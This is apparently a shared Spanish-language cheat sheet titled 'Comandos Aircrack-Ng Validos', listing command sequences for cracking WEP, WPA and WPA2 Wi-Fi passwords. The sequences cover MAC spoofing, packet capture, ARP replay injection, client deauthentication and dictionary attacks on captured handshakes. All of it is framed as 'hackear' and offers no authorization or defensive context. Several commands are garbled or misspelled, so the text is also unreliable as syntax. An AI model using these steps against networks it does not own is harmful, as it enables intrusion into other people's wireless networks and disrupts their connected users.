Comandos Aircrack-Ng Validos

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 2

hackear Wap opcion1: -----ventana1-------airmon-ng airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng

start wlan0 airodump-ng ath0 airodump-ng -w miguel -c 1 --bssid 00:18:3f:84:37:71 ath0 -----ventana2-------aireplay-ng -1 -0 -a 00:18:3f:84:37:71 ath0 nota:carita feliz aireplay-ng -1 0 -e worexone -a 00:18:3f:84:37:71 -h 00:11:22:33:44:55 ath0 nota:read # packtes c goto ## arp request etc -----ventana3-------aireplay-ng -3 -b 00:18:3f:84:37:71 ath0 nota:esperar 1/4 de hora y regresamos a la ventana 1 -----ventana1.1-------nota:ver si #data tiene 30000 y de ahi regresamos a la ventana 3 -----ventana3.1-------nota: presionamso Ctrl+c(detener el proceso) dir(enter) aircrack-ng miguel-01.cap nota: opening miguel-01.cap read 65241 packts escojamos elq ue tenga network keyfound (10 codigos) opcion2: -----ventana1-------airmon-ng stop wlan0 airmon-ng stop ath0 airmon-ngstart ath0 iwconfig airodump-ng ath0 nota el valor de #s nos indica cantidad de datos airodump-ng --channel 11 --write exploit ath0 -----ventana2-------aireplay-ng -3 -b 00:14:15:e8:14:45 -h 00:11:22:33:44:55 ath0 nota: esto captura aquetes debem ser mas de ARP 60000 escribimos CTRL+c nota:para crackear aircrack-ng exploid-01.cap seleccioanmso el nuemrod e red keyfound (00:14:54:87:45) -----ventana3------------ventana4--------

HAckear wpa -----ventana1-------airmon-ng start wlan0 nota: Ctrl+C airodump-ng -c 11 -w wpacrack -bssid 00:25:9c:c4:c4:45 mon0 nota:empieza captura

-----ventana2-------aireplay-ng -0 10 -a (bssid mac Ap) -c (station Mac Cliente) mon0 -----ventana3-------aircrack-ng wpacrack-01.cap aircrack-ng wpacrack-01.cap -w dictionary-spanish.dic nota:empieza crack final end keyfound(09 codigos) HAckear wpa1 - wpa2 -----ventana1-------airmon-ng iwconfig wlan0 mode monitoring ifconfig wlan0 up airodump-ng wlan0 nota: Ctrl+C airodump-ng -w captura -c 3 --bssid 00:25:9c:c4:c4:45 wlan0 -----ventana2-------iwconfig wlan0 channel 3 bssid station aireplay-ng -0 1 -a 00:25:9c:c4:c4:45 -c 00:15:45:c8:c8:78 wlan -----ventana3-------explorer: cd /pentest/wireless/aircrack-ng/test nota:apareceuna linea azulen ella copiamos: aircrack-ng -w/root/captura-01.cap -----ventana4-------explorer:pentest/wireless/compatty nota:aparece una linea azul escribimos: ./compatty-r/root/captura-01.cap -f dict -s wlan -83 nota: le damos enter y vamos a la ventana 3 -----ventana3.1-------nota:escribimos en la linea azul nueva: aircrack-ng -w password.lst/root/captura-01.cap (enter) nota:y eta saliendo el crack keyfound nota:Nos vamos a la venatana 4 y vemos el keyfound( psk is 10 digitos).

You might also like